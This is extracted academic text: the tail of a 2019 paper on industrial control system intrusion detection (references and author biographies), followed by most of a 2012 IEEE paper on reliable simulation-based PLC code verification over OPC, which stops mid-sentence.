principal component analysis approach for detecting traf c anomaly in industrial networks,'' J. Xi'an Jiaotong Univ. , vol. 46, no. 2, pp. 7883, 2012. [36] M. H. Aghdam and P. Kabiri, ``Feature selection for intrusion detection system using ant colony optimization,'' Int. J. Netw. Secur. , vol. 18, no. 3, pp. 420432, May 2016. [37] M. Kroto l, J. Larsen, and D. Gollmann, ``The process matters: Ensuring data veracity in cyber-physical systems,'' in Proc. 10th ACM Symp. Inf., Comput. Commun. Secur. , Apr. 2015, pp. 133144. [38] E. Colbert, D. Sullivan, S. Hutchinson, K. Renard, and S. Smith, ``A process-oriented intrusion detection method for industrial control sys- tems,'' in Proc. 11th Int. Conf. Cyber Warfare Secur. New York, NY, USA, Academic, 2016, p. 497. [39] D. Had iosmanovi , R. Sommer, E. Zambon, and P. H. Hartel, ``Through the eye of the PLC: Semantic security monitoring for industrial processes,'' inProc. 30th Annu. Comput. Secur. Appl. Conf. , Dec. 2014, pp. 126135. [40] A. Carcano, A. Coletta, M. Guglielmi, M. Masera, I. N. Fovino, and A. Trombetta, ``A multidimensional critical state analysis for detecting intrusions in SCADA systems,'' IEEE Trans. Ind. Informat. , vol. 7, no. 2, pp. 179186, May 2011. [41] R. J. Patton, ``Robustness in model-based fault diagnosis: The 1995 Situa- tion,'' Annu. Rev. Control , vol. 21, pp. 103123, Jan. 1997. [42] A. A. C rdenas, S. Amin, Z.-S. Lin, Y.-L. Huang, C.-Y. Huang, and S. Sastry, ``Attacks against process control systems: Risk assessment, detection, and response,'' in Proc. 6th ACM Symp. Inf., Comput. Commun. Secur. , Mar. 2011, pp. 355366. [43] S. Sridhar and M. Govindarasu, ``Model-based attack detection and miti- gation for automatic generation control,'' IEEE Trans. Smart Grid , vol. 5, no. 2, pp. 580591, Mar. 2014. YAN HU was born in 1988. She received the B.S. degree in automation from Xi'an Jiaotong Univer- sity, Xi'an, Shannxi, China, in 2011, and the Ph.D. degree in computer science from the University of Chinese Academy of Sciences, Beijing, China, in 2017. Since 2017, she has been an Assistant Professor with the University of Science and Technology Beijing, China. Her main research interests include security of industrial control systems, security of the Internet of Things, and service computing. YUYAN SUN was born in 1982. He received the B.S. degree in computer science from Peking Uni- versity, Beijing, China, in 2004, and the M.S. and Ph.D. degrees in computer science from Univer- sity of Chinese Academy of Sciences, Beijing, in 2007 and 2016, respectively. From 2007 to 2012, he was a Research Assistant with the Institute of Software, Chinese Academy of Sciences. Since 2016, he has been an Assis- tant Professor with the Beijing Key Laboratory of IoT Information Security, Institute of Information Engineering, Chinese Academy of Sciences, and School of Cyber Security, University of Chinese Academy of Sciences. His main research interests include security of indus- trial control systems and the IoT. YOUCHENG WANG received the B.S. degree in telecommunications engineering from Hubei University, Wuhan, China, in 2011, and the Ph.D. degree in electromagnetic wave and microwave technology from the University of Chinese Academy of Sciences, Beijing, China, in 2016. From 2011 to 2016, he was a member of the Laboratory of Electromagnetic Radiation and Sensing Technology, Institute of Electronics, Chinese Academy of Sciences, Beijing. He is currently with the Beijing Electro-Mechanical Engineering Institute, Beijing. His research interests include the Internet of Things, ultrawideband (UWB) antennas and array antenna, electromagnetic scattering characteristics, and the application of UWB radar. ZHILIANG WANG was born in 1956. He received the B.S. degree in industrial automation from Yanshan University, Qinhuangdao, Hebei, China, in 1982, and the M.S. and Ph.D. degrees in electronic engineering from the Harbin Insti- tute of Technology, Harbin, Heilongjiang, China, in 1985 and 1988, respectively. From 1988 to 1991, he was a Postdoctoral Researcher with Zhejiang University. Since 1991, he has been a Professor and a Ph.D. Supervisor with the University of Science and Technology Beijing, China. His main research interests include the Internet of Things and robot technology. 156882 VOLUME 7, 2019
Methods_for_Reliable_Simulation-Based_PLC_Code_Verification.pdf
Simulation-based programmable logic controller (PLC) code veri cation is a part of virtual commissioning, wherethe control code is veri ed against a virtual prototype of an appli-cation. With today s general OPC interface, it is easy to connect aPLC to a simulation tool for, e.g., veri cation purposes. However,there are some problems with this approach that can lead to anunreliable veri cation result. In this paper, four major problemswith the OPC interface are described, and two possible solutionsto the problems are presented: a general IEC 61131-3-basedsoftware solution, and a new OPC standard solution.
IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 267 Methods for Reliable Simulation-Based PLC Code Veri cation Henrik Carlsson, Bo Svensson, Fredrik Danielsson, and Bengt Lennartson , Member, IEEE Index Terms Industrial control system, programmable logic controller (PLC), simulation, simulation-based PLC code veri ca-tion, virtual commissioning. I. I NTRODUCTION THE term industrial control system is a broad de nition for programmable controllers used in industry to control machines and processes. An example of an industrial controlsystem commonly used in industry today is the Programmable Logic Controller (PLC). An industrial PLC handles not only discrete events and supervisory control; it also handles ana-logue feedback, motion control, positioning control, and othertime-critical functions. Therefore, in this paper, PLC is used as a general name for industrial control systems. The most charac- teristic feature of PLCs is the reprogrammable control functionthat is described by the control code. PLCs are usually de nedas hard real-time systems, which implies that the PLCs have a guaranteed scan cycle time and that the control code must be executed within this time frame [1]. Traditionally, the development of PLC controlled applica- tions, mechanical design and control code programming havebeen performed sequentially [2], [3] and partly online, where the control engineer has to wait with the programming, veri - cation and optimization of the control code until the mechanicalengineer is done with his or her work. Manuscript received June 17, 2011; revised September 13, 2011; accepted November 16, 2011. Date of publication January 02, 2012; date of current ver-sion April 11, 2012. This work was supported in part by the European Commis- sion Project FLEXA, under Grant 213734. Paper no. TII-11-287. H. Carlsson, B. Svensson, and F. Danielsson are with the Flexible Indus- trial Automation Research Group, Department of Engineering Science, Uni- versity West, SE-46186 Trollh ttan, Sweden (e-mail: [email protected]; [email protected]; [email protected]). B. Lennartson is with the Flexible Industrial Automation Research Group, Department of Engineering Science, University West, SE-46186 Trollh ttan, Sweden and also with the Department of Signals and Systems,Chalmers University of Technology, SE-41296 G teborg, Sweden (e-mail: [email protected]). Color versions of one or more of the gures in this paper are available online at http://ieeexplore.ieee.org. Digital Object Identi er 10.1109/TII.2011.2182653A more attractive way is to do this in a concurrent way and totally of ine, where both the mechanical and the control en- gineers work in parallel [3], [4]. A common name for this of- ine and concurrent process planning approach is virtual com-missioning [3] [7]. A broad de nition of virtual commissioningmight include such tasks as design (e.g., xtures, robot tools and factory layout), programming (e.g., PLC, robots, CNC ma- chines, servo cams), veri cation and optimization [8], [9]. How-ever, the focus in this paper is on simulation-based PLC codeveri cation where real PLCs are used together with simulationtools. Several examples exist of how industrial control systems and PLCs can be connected to simulation tools; two industrial de facto standards for this connection are RRS and OPC. RRS is a standardized interface between a simulation tool and a repre-sentation of a robotic control system, while OPC is a more gen- eral approach for communication with PLCs and other control equipment. RRS has a synchronization mechanism that makessure that all robot movements are simulated [10]. The more general approach, OPC, includes a number of spec- i cations that de ne interfaces between PLCs and regular com- puter applications. Today, state-of-the-art robot simulation anddiscrete event system simulation implement an OPC client thatallows PLCs to control the simulation model. However, OPC suffers a major drawback; no mechanism exists [10] that guar- antees that all computations performed in the PLC are consid-ered in the simulation. This can lead to two types of problem:1) real-world errors are not discovered in the simulated world and 2) errors are discovered that do not exist in the real world. In this paper, four major issues that will trigger the above- mentioned OPC problems are identi ed and discussed. These is-sues will cause unreliable PLC code veri cation. To solve theseissues two solutions to the problem are suggested: 1) an IEC 61131-3-based solution that could be implemented in a PLC at the design phase of the application and 2) a proposal for a newOPC interface that includes a mechanism to guarantee reliablePLC code veri cation. These solutions have been veri ed with a formal model, constructed in NuSMV [11] and proved to work. A case study is also presented to show the hazardous effect ofunreliable PLC code veri cation. II. I NTERFACES BETWEEN PLCS AND CAPETOOLS Tools that could be used for simulation-based PLC code ver- i cation usually sort under Computer Aided Production En- gineering (CAPE) tools. CAPE is a general term for produc-tion-related simulation tools. There are two main subtypes oftools [12] [15]: 1) Discrete event system simulation (production ow simula- tion), which can be used to analyze performance or product 1551-3203/$31.00 2012 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. 268 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 ow in a cell, factory or enterprise. Months or even years of production can be simulated in a short while. 2) Robot simulation (geometric and kinematic simulation or Computer Aided Robotics), where robots and other moving devices can be simulated and programmed of ine. A common feature of all these CAPE tools is their ability to handle several types of production scenario on different levels, where a variety of robots, machines, manufacturing resources, control logic representations, etc., are integrated in a uni edsimulation. However, the representation of the control functionsin CAPE tools is usually conducted on a general level and de- scribed using a simpli ed model of the main functional behavior of the real PLC [16]. An example of a simpli ed control func-tion representation in a CAPE tool is a Sequence of Operationslist. Consequently, with simpli ed PLC models, the real control functions, including motion controls, etc., are not executed. A solution to the CAPE tools drawback of simpli ed PLC models is to use a hardware-in-the-loop simulation. Hard-ware-in-the-loop simulation, described in, e.g., [17] and [18], is a real-time simulation method in which real hardware, e.g., a PLC, is embedded in the simulation. Hardware-in-the-loopsimulation as a means of testing control systems is not new;the aerospace industry has been using this technique ever since software rst became a safety-critical aspect of ight control systems [19]. Freund et al. [20] have identi ed and described the integration problem between a real PLC and the remaining part of the sim- ulation model. The main problems identi ed include a lack of time synchronization and a real-time data transfer mechanism.The time synchronization problem is due to the fact that theCAPE part of the simulation model runs in another time space (virtual time) compared to the introduced PLC, which runs in real-time. Ma et al. [15] identify the problem with real-time de- pendent control system functions, e.g., timers, when other partsof the simulation run in virtual time. There are some different methods to include a PLC in a sim- ulation. In [21], the simulation uses interfaces to a eldbus forcommunicating with the PLC. A more general approach is touse the OPC interface that is presented in detail in this paper. A. Realistic Robot Simulation (RRS) Realistic Robot Simulation (RRS) is a standard interface between robot simulation tools and robot control systems. By using RRS, it is possible to use of ine created control programsin the real robot without any correction [22]. The main driving force for the RRS project was the error in- troduced in simulated robot paths due to a lack of realistic sim- ulation of the controller behavior. The idea of RRS is to integrate the part of the robot motion control software that is responsible for the motion behavior into the simulation system. Hence, the simulation is controlled by the same motion control strategies as the real robot will be [23].In 1998, the RRS-2 project was started; the aim was to coverfull functionality of robot controllers. Further, the RRS consortium has presented a solution for sim- ulating the control function of general PLCs [10], [23], [24].This approach is based on virtual controllers, developed by thePLC manufacturer, connected to the simulation tool. However,to the authors knowledge there is no product available today that uses this approach. B. Fieldbus Emulation Fieldbus emulation is a technique to include the target eldbus in the simulation. The main purpose of eldbus emula- tion is to test the real PLC code with correct addresses and thecomplexity of the real bus. This will allow veri cation of hard-ware con gurations and signal allocations. It will also enable the developer to use the real I/O dependent variable names and symbols. A real PLC or emulated one is connected to the virtual eldbus and the bus nodes are modelled inside the CAPE tool.Fieldbus emulation can be found in, e.g., WinMOD. Most of the existing eldbus emulators do not address unreliable veri - cation introduced by the simulation. However, SIMBA Pro andSIMIT address this by adding additional hardware. They offerthe possibility to implement small models on board dedicated hardware. For larger models they offer an OPC connection to more standard CAPE tools. Further, SIMBA Pro and SIMITare Siemens S7 speci c solutions and not generic. For relatively slow processes and small systems this might be an ef cient way. With extensive simulation models real-time in- deed becomes an issue. It is possible to combine the proposedsynchronization method presented in this article with eldbus emulation techniques to ensure correct behavior in all circum- stances. A eldbus emulator for Pro bus and CAN has been im-plemented to test this. However, this is not the focus of this paperand therefore only mentioned as this. C. OPC OPC was founded by a few companies in the mid 90s in order to ease the exchange of process data [25]. OPC has been, andstill is, developed by the OPC Foundation[26]. OPC is server-client based, where the server is vendor-speci c and the client general. OPC consists of several speci cations [25] [27]. These speci cations contain information about how the server andthe client should exchange data. OPC DA (Data Access) was the rst speci cation [28] that made it possible for any OPC DA client to access data from an OPC DA server that ful lsthe same speci cation. OPC DA is used for moving real-timedata from devices to Microsoft Windows applications, where real-time here means current data in the device, not historical. Nothing is said about how the data is transferred from thedevice to the application, and real-time is not de ned either. OPC DA is based on COM/DCOM, which is a Microsoft technology. This choice leads to platform dependency, and there is, for instance, no standard solution for using OPC on Linux,even though such solutions exist. Another issue with OPC is theproblem with rewalls when the OPC client and server are lo- cated on different machines. This is due to DCOM, a problem that can, however, be overcome by a tunneller [29]. A rst attempt to select another platform than COM/DCOM was presented within the OPC XML-DA speci cation, where COM/DCOM was replaced by web services. However, the performance was very poor compared to OPC DA [30].Toovercome this weakness, a new speci cation was introduced;this speci cation is called OPC Uni ed Architecture (OPC Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. CARLSSON et al. : METHODS FOR RELIABLE SIMULATION-BASED PLC CODE VERIFICATION 269 Fig. 1. OPC communication model. UA) [31]. OPC UA uses two different transport protocols; SOAP over HTTP and TCP [32]. Compared to OPC XML-DA, OPC UA also supports binary encoding of the data instead of the XML encoding that produces a large amount of overheaddata. The performance of OPC UA compared to OPC DA issomewhat slower, between 1.1 and 1.6 times when reading values [32]. According to Matrikon [33], the plan is not to replace OPC DA with OPC UA, instead both speci cations should coexistand complement each other. OPC DA is still the most common speci cation, 99% of all OPC products today are implementa- tions based on OPC DA [32]. Since this paper deals with CAPEtools, and to the authors knowledge there is no commercial CAPE tool available today that supports OPC UA, only OPC DA is considered. OPC UA is, however, very interesting. PLCOpen[34], a worldwide organization that works for resolving topicsrelated to control programming, has chosen OPC UA as its tech- nology for data exchange. An alternative to OPC DA is the OMG [35] speci cation Data Acquisition from Industrial Sys-tems (DAIS) [36]. DAIS is based on real-time CORBA [37].However, this speci cation is not used in the type of application covered in this paper. CAPE tools and PLCs of today generally utilize OPC for intercommunication. D. OPC Together With CAPE Tools The possibility of including real PLCs in CAPE tools has been around since the mid 90s, utilizing vendor-speci c proto-cols. Some common purposes are of ine programming, veri - cation, and optimization. Since the beginning of the last decade, many CAPE tools have an OPC client implemented, usually anOPC DA client, which makes it possible to connect to any OPCDA server [38]. The I/Os in the PLC control code are made avail- able to the OPC server. CAPE tools usually have some kind of signal representation similar to real machines, e.g., a start signalfor a robot. These signals are then mapped to the I/Os from thePLC via OPC. The simulated machine or process can thereby be controlled in the same way as it would be in reality. Exam- ples of CAPE software with OPC functionality include: DelmiaAutomation, Visual Components, Process Simulate, and Arena. E. OPC Communication To ease further discussion of OPC, a model of OPC commu- nication is introduced, see Fig. 1. Fig. 1 shows a general model for how an application (1), with an integrated OPC client (2), can connect to a PLC (8). Thereare three different communication parts in this model: the OPCinterface (3), i.e., COM/DCOM, the communication interface (5) between the OPC server (4) and the gateway (6), and the gateway interface (7) to the PLC. There might be other models, where, e.g., the OPC server has an integrated gateway, but the principle is still the same. Another Fig. 2. Explanatory sketch of example application. scenario is an integrated OPC server in the PLC, where (6) and (7) might be unnecessary. In general, the model is valid for a standard OPC connection. III. I DENTIFIED PROBLEMS WITHCURRENT INTERFACES With today s general OPC interface it is easy to connect a PLC to a simulation tool for, e.g., veri cation purposes.However, when verifying PLC control code with this method, one might encounter several unexpected problems due to free-wheeling. Free-wheeling is de ned in this paper as asyn-chronous execution of the PLC and simulation tool. Theseproblems will indeed affect the result and lead to unreliable veri cation. The problems identi ed in this paper can be di- vided into four main categories, namely: time delay, jitter, racecondition, and slow sampling. These will be described in detailin the following subsections. OPC UA, which was mentioned earlier, does not introduce any mechanism that would solve this problem, so the rest of this paper will only deal with OPC DA,since it is the most commonly used speci cation today. A PLC controlled sheet metal shear will be used as an ex- ample to explain the different problem categories, see Fig. 2. A typical shearing line is used to produce sheet metal blanks of thedesired length. In this example two actuators, 1 and 2, are usedto drive the shear blade up and down. Two sensors, Sensor_1 and Sensor_2, are used to level the shear blade at the upper position. Each actuator is equipped with a position feedback sensor to beable to control the lower position limit. A kinematic simulationmodel of the described process was implemented and then con- nected to a real PLC via OPC to demonstrate the phenomena. The PLC has a cycle time of TPLC. A simpli ed PLC code ex-ample of the low level control is shown in Fig. 3. It will representthe PLC (8) in the model described in Fig. 1. To be able to perform an accurate and reliable simulation, all values from the simulation should be considered in the PLC andvice versa . The tools (hardware and software) that have been used in this paper are as follows. CoDeSys Soft PLC [39]. BinarBifas 60 PLC [40]. CoDeSys OPC server, (supports OPC DA 2.0) [39]. Process Simulate. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. 270 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 Fig. 3. Part of the PLC program to control the sheet metal shear implemented in IEC 61131-3 Ladder Diagram (LD), the declaration part is not included. ixDown and ixUp are signals to run the shear blade up and down. Integration Objects OPC Data Access client SDK (sup- ports OPC DA 2.05) [41]. A sheet metal shear model. A. Free-Wheeling To run a PLC and simulation asynchronously, i.e., the PLC is running at its own pace with respect to the simulation pace, is de ned in this paper as free-wheeling. Free-wheeling appearsto be the most commonly used scenario today when connectingreal PLCs to CAPE simulations. Free-wheeling will introduce four major issues namely jitter, race condition, slow sampling and time delay. Simulations using the OPC or similar techniquesthat do not consider these four problems will in this paper bereferred to as unreliable simulations. The classi cation presented in this paper; time delay, jitter, race condition and slow sampling, are not covered in the litera-ture in relation to OPC communication and CAPE tools. All fourissues are usually presented in the literature as one common, unspeci ed issue or problem. In this paper, it is referred to as free-wheeling. B. Common Solution to the Free-Wheeling Problems The most common solution found in the literature to the prob- lems introduced by free-wheeling is synchronization throughhalt, based on the assumption that the CAPE tool has the possi- bility to run faster than the PLC [15], [39], [40]. According to this assumption, it should be possible to halt/slow down, whennecessary, the faster CAPE tool in order to maintain a synchro-nized system. However, these time synchronization methods are shown in this paper to not work. To show this effect, such a syn- chronization method was applied in the sheet metal shear ex-ample. A high-speed timer was used in the simulation to achievehigh accuracy and to match the PLC cycle time. This timer was used to halt the simulation in order to achieve a synchronized Fig. 4. Measured actuator position during the simulation of the sheet metal shear. Each line represents a run, and each run was carried out at the exact same conditions. system. The result from the experiment, shown in Fig. 4, re- veals the behavior of a nonreliable veri cation. If the suggestedmethods in the literature had worked as expected, Fig. 4 shouldhave shown one single straight line. C. Jitter and Time Delay The cycle time of the CAPE tool, (1) in Fig. 1, , is the time needed for the simulated actuators to execute new values.Theoretically, if is not equal to , nondeterministic behavior might arise. In practice, due to non-real-time behavior of common operating systems, is indeed not equal to . In essence, the problem is that a regular PC, its operating system and the CAPE tools cannot be considered to be a real- time system [42], and a non-real-time system is not designed to respond to time-dependent signals in a deterministic way.The common suggestion, found in the literature, is to speed upthe CAPE simulation. However, must still be exactly equal to to guarantee deterministic behavior. No working mechanism exists in the OPC speci cation that can solve thisproblem. Even if it were possible to run CAPE tools at the same pace as the real PLC, there would still be time uncertainties due to the microprocessors in regular computers and the operating system.This phenomenon is referred to as jitter [43]. Jitter can be de ned as randomly varying time delays [44]. If a constant time offset exists, it can be referred to as time delay . Hence, the total time uncertainty is jitter+time delay . The complicated communication paths in the OPC speci ca- tion, see Fig. 1, will introduce jitter and time delay. This will indeed be intensi ed if a communication component with lowbandwidth is a part of the OPC chain. The jitter and time delaywill cause unreliable veri cation results. For instance, the OPC interface (3), based on COM and DCOM, can introduce problems because of its lack of real-timesupport [45]. In [45], a possible approach to providing real-timesupport for COM is presented, provided that the underlying operating system supports real-time operations. Since OPC uses COM for the communication between the server and theclient, it is possible to apply this approach. However, there areto the authors knowledge no examples of industrial CAPE tools that support real-time operations, and thus would it still be Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. CARLSSON et al. : METHODS FOR RELIABLE SIMULATION-BASED PLC CODE VERIFICATION 271 Fig. 5. Sheet metal shear alignment code example in IEC 61131-3. Fig. 6. Two identical simulations of the calibration code in Fig. 5. In Run 1, a race condition phenomenon occurs, and the OK signal c is not triggered as in Run 2. problem with lack of real-time support in the communication model presented in Fig. 1. To demonstrate the result of jitter, randomly varying time de- lays, the sheet metal shear example was setup to run with a PLCscan cycle of 10 ms and a simulation scan cycle of 10 ms. The OPC update rate was set to 1 ms for the OPC client group used, see OPC group object in the OPC DA speci cation [28] for more details. The position of Actuator 1 was measured and plotted in Fig. 4 for six different runs. According to the deterministic behavior of both the PLC and the kinematic model, the expected outcome is six identical runs. However, due to the jitter problem introducedby the OPC interface or due to the possible skew PC clock, theoutcome is unreliable and stochastic. The test was carried out both on a soft PLC and a real PLC with the same result. The target equipment, e.g., sensors and actuators, might in- troduce jitter dependent on mechanical or electrical properties.However, the jitter found in the real equipment does not corre- spond to the one introduced by the OPC interface. The intention with this work is to eliminate phenomena introduced by the sim-ulation tools such as jitter. If it is important to include the jitterfrom the real equipment in the simulation it should be modelled in a standard way, e.g., as a normal distribution . D. Race Condition A race condition arises when the result is dependent on the sequence or timing of several events. A race condition mightoccur when two or more OPC dependent variables change at the same time (i.e. in the same cycle), but the result is transferred to the receiver at different times. The problem can be explained bythe following sheet metal shear example, where the code sectionin Fig. 5 is used for detecting miss alignment of the shear blade. The result is simulated behavior, see Fig. 6, that differs from the real one. This error will not occur in the real application, butit will cause unnecessary troubleshooting. There is no mechanism in the OPC speci cation that can guar- antee correct behavior in this situation. This behavior is actually described in the OPC DA speci cation, and the solution to theproblem is additional handshaking and ag passing between theclient and server [28]. This behavior can also be referred to as inexact synchronization [46]. Fig. 7. Example of slow sampling. E. Slow Sampling An OPC client speci es the fastest rate at which data changes may be updated from the server, i.e. the sampling rate. However, this sampling rate is not necessarily the same rate at which data will be transferred between the PLC and the OPC server. Indeed, the sampling rate is crucial for a deterministic and reliable simulation. Changes that are faster than the update rate will not be recognized by the client, see Fig. 7. In the sheet metal shear example the upper sensor signals Sensor_1 and Sensor_2 are critical input signals from theprocess. However, with an OPC update rate that does not match the PLC or the simulation, slow sampling problems may easily occur. F . New Standard The purpose of OPC has never been to supply CAPE tools with data in real-time; this functionality has been adopted by theCAPE tool vendors. It would, however, be possible to use OPCas a more extensive tool for PLC code veri cation if the PLC vendors, CAPE vendors and OPC Foundation could agree on an extension to OPC, where some kind of synchronization is builtinto the speci cation. The purpose of the synchronization is toachieve reliable simulation results. A proposal for this extension is presented at the end of this paper. IV . SDSP S IMULATION ARCHITECTURE Due to the lack of suitable, reliable and deterministic methods for the veri cation of PLCs together with CAPE tools, an architecture for distributed simulation and time synchroniza- tion SDSP was formulated in [48]. Distributed simulationwith SDSP is not discussed further in this paper, for more information and examples see, e.g., [47] and [48]. SDSP is responsible for the following. Communication with all simulation clients. A common synchronized time. Common simulation data, e.g., I/Os. Handling of distributed simulation. SDSP is a server-client-based concept with the server being responsible for managing the simulation. Whilst SDSP is mainly based on TCP/IP, other methods of communication are possible, such as, for instance, DDE, OPC or shared memory. One of themost important tasks for the server is to manage each subsetof simulations to form an overall time-uniform simulation. The way in which this can be accomplished is set out below. In order to use a CAPE tool in this concept, the tool must have an application programming interface (API) that makes itpossible to include an SDSP client within the tool. This client can then handle the communication between the CAPE tool and Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. 272 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 Fig. 8. States and associated actions for the simulation as represented in the SDSP server, described in SFC. The quali er P1 means that the action is exe- cuted once at the entrance of the step, and P0 once at the exit of the step. RE means that the synchronize event is triggered on a rising edge. the SDSP server. This is a common feature for many CAPE tools, e.g., ROSE for Robcad and Tecnomatix. NET SDK for Process Simulate. In essence, the server contains common data (e.g., I/O values, servo values, and simulation parameters) and common logic. The server also contains an overall simulation or virtual time and a state set { server.start ,server.initial-write ,server.pre- write ,server.write ,server.pre-read ,server.read }, see Fig. 8. Initially, the server sets up the necessary structure in the data- base and sets the overall simulation state to server.start . As a minimum requirement to form a simulation, the server needs information about the time step , a formal start condi- tionstart , and the number of clients. The start condition tells the server when the entire simulation can commence, and generallythe start condition de nes when all clients required to run thesimulation are ready to start. The step is the smallest time step that the overall simulation can handle. However, a delay mechanism allows a client to run with a different time step,larger than , than in the overall simulation without sacri- cing time synchronization. For example, the delayed mecha- nism can be used in discrete event simulations to delay the syn- chronization for a speci c client with the time , where is the time for the next event. A client is considered to be ready to start when it has been connected to the server and has joined the simulation. When the start condition is ful lled, the initial write state, server.initial-write , is entered. is the number of clients in the simulation; the start logic ar- gument can be used to introduce additional start conditions for the start of the simulation. Fig. 9. States and associated actions for each client (subsimulation) as repre- sented in the SDSP server, described in SFC. The quali er P1 means that the action is executed once at the entrance of the step. N means that the step is ex- ecuted as long as the step is active, but after P1. This mechanism provides the deterministic start behavior for the overall simulation. In the initial write state, each client hasreached their client.setup state where they are supposed to ini- tialize their own data (e.g., all inputs and outputs are set to 0), while the overall simulation time, the virtual time , is also set to 0. To enter the following states, the following synchronize condition must be ful lled: The signal indicates when a single simulation client is running ( FALSE ) or the point when it is ready and has executed the current time step ( TRUE ) After the initial write state, the overall simulation enters the pre-read and then the read state, see Fig. 8. Each client reaches itsclient.read state synchronously, see Fig. 9. In this state, each client is supposed to read data from the server. When all of theclients have executed their client read task and thereafter aresynchronized by the server, the overall simulation enters the pre- write state, server.pre-write . At the same time all clients enter the client.run state and are supposed to execute their main tasks, e.g., a program cycle for aPLC. The virtual time, , is updated to the next time step at the read state, server.read , meaning that . This tight synchronization procedure is necessary for a reliable simulation,and to prevent clients from acting in the wrong time space, i.e.,one time step before or after the desired time. To verify that this concept works, a formal model of the server-client concept has been formulated in NuSMV [11], seethe Appendix. This model allowed it to be veri ed, among other results, that the clients follow each other synchronously. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. CARLSSON et al. : METHODS FOR RELIABLE SIMULATION-BASED PLC CODE VERIFICATION 273 V. T IME SYNCHRONIZATION WITHPLCS The SDSP simulation architecture presented above is de- signed to handle veri cations of time-dependent control codein PLCs connected to CAPE tools, i.e., to deal with the four problems, time delay ,jitter ,race condition, and slow sampling , described previously. The internal clock in a PLC controls the execution to guar- antee the cycle time and to achieve deterministic behavior. Due to this fundamental behavior in the real PLC, it has only been possible to incorporate an emulated or simulated PLC in theSDSP simulation architecture. Emulation of a PLC is a technique used to obtain an exact representation of a real PLC [49]. In [47], an emulator of a PLC was used and it was extended to include a number of additionalSDSP functionalities, thus making it possible to use it in con-junction with the time synchronization mechanism. Even though an emulator is a good representation of a PLC, the real PLC is nevertheless preferable in many situations. Thisis because of a lack of emulators, coupled with the fact thatcreating an emulator can be extremely time-consuming. However, even if it is possible to connect PLCs to the simu- lation architecture over OPC, it is not possible to directly timesynchronize them with the mechanism within the architecture.To overcome this hurdle, a general method for the time syn- chronization of an IEC61131-3-based PLC is described in this section. In order to utilize the new time synchronization method, the following requirements must be ful lled. The PLC must support the IEC 61131-3 programming lan- guage standard. The PLC must be able to communicate with a regular com- puter, e.g., by OPC. The entire simulation must utilize an architecture that of- fers a time synchronization mechanism. IEC 61131 is an international standard for programmable controllers, and is divided into several parts. IEC 61131-3 [50] describes a PLC software structure, languages and program execution [51]. In order to use the method presented in this paper, three mod- i cations to the original control code to be veri ed need to be made: (1) A scheduler Program Organization Unit (POU), which is used as a complement to the original scheduler, mustbe added to the control code. (2) All program POUs within the con guration need a speci c execution control function. (3) All time dependent function blocks and functions must be convertedto deal with virtual time. The sections marked in Fig. 10 repre-sent these modi cations and will be described. A. The POU Scheduler (1) In order to implement a complementary scheduler, all POUs within the con guration must be set to the same priority, e.g., 1, and organised in the same task. The complementary sched-uler POU is set to a higher priority, e.g., 0. This is to guaranteethat the scheduler is executed rst in every program cycle. The scheduler communicates with the SDSP architecture through two synchronization variables via, e.g., OPC. When it is time to execute the control code in the PLC, the scheduler receives a signal from the server and the scheduler Fig. 10. Description of the supervisor POU and the connection to the normal POUs. Fig. 11. Pseudocode describing the execution controller. decides which of the other POUs should be executed by sending speci c execution signals , see Fig. 10. There is no standard or general way to halt the real-time clock on a real PLC, as demanded by the simulation architecture. Consequently, the scheduler also handles the virtual time, , by reading the current value from the simulation server. This time is then stored as a global resource. The resource is then used as a replacement for the real-time clock. B. Execution Controller (2) To be able to control the execution order and timing of all POUs within a con guration, certain additional functionality must be added to each scheduled POU. This is accomplished bymeans of a speci c header and footer. This execution controlcan be implemented for all IEC 61131-3 languages. The execu- tion controller, described in pseudo code in Fig. 11 determines whether or not the desired program should run. However, the graphical language SFC has a more complex ex- ecution order that requires another type of execution controller [52]. An SFC consists of a series of steps and transitions, where each step can be associated with either one or a series of actions[51], the behavior of the action being determined by the actionquali er. For example, the quali er N means that the action will execute while the step is active and the quali er L will execute for a limited time, de ned by T. According to the IEC 61131-3 standard [50], each action is associated with an instance of an Action Control function block . This function block controls the activation and deactivation of the action, depending on the action quali er used. Due to thefact that some of the action quali ers are time dependent, thePLC programming environment must offer access to modify the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. 274 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 Fig. 12. Example of a PLC Open motion control function block. action control function block in order to be able to use the pro- posed method within an SFC POU. The internal time dependent functions used in the function block must be updated so they can handle virtual time and an extra execution signal must be addedthat enables the SFC POU to execute at correct time. In SFC, the transitions between each step can also be time de- pendent, i.e., a particular step can be active for a speci c amount of time. This can be solved if it is possible to control these tran-sitions. Should this not be possible, however, the same behaviorcan be obtained within the actions. C. Time Dependent Functions (3) IEC 61131-3 contains four standard timer function blocks, Timer On Delay (TON), Timer Off Delay (TOF), Timer Pulse (TP) and Real-Time Clock (RTC) [50]. However, these function blocks cannot be used directly, since they are usually based onthe hardware clock that continues to run even though the clockshould be halted according to the server. Therefore, special re- placement timers are used. The replacement timers behave in the same manner as the regular ones, the only difference beingthat they use the virtual time received from the server. The vir-tual time is updated for all clients in the simulation at the same time. There may also be other (not IEC 61131-3) vendor-speci c functions, such as motion control blocks, that depend on thehardware clock. Thus, in order to be able to use the proposed time synchronization method these functions must also be up- graded to handle the virtual clock. For motion control 